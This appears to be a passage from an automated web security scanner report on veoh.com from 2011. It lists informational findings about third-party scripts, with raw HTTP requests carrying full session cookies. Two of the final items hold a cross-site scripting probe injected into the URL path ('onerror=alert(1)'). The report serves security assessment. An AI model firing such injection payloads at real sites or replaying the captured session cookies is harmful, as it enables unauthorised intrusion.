<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.423. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=46
Content-Length: 134905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v2075425966g5b8E8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768502"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.424. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:15 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 134399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20754927ZpAfSEzt&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768555"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.425. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 134852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20756872Ta2Y7sDB&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768523"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.426. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:57 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 134505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20757961gnh48zmS&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768537"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.427. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=6
Content-Length: 132755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20758438BTte3QQz&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768558"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.428. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=15
Content-Length: 94311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768551"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.429. http://www.veoh.com/browse/videos/category/action_adventure4957f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure4957f HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 57369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768574"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.430. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768573"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.431. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:21 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
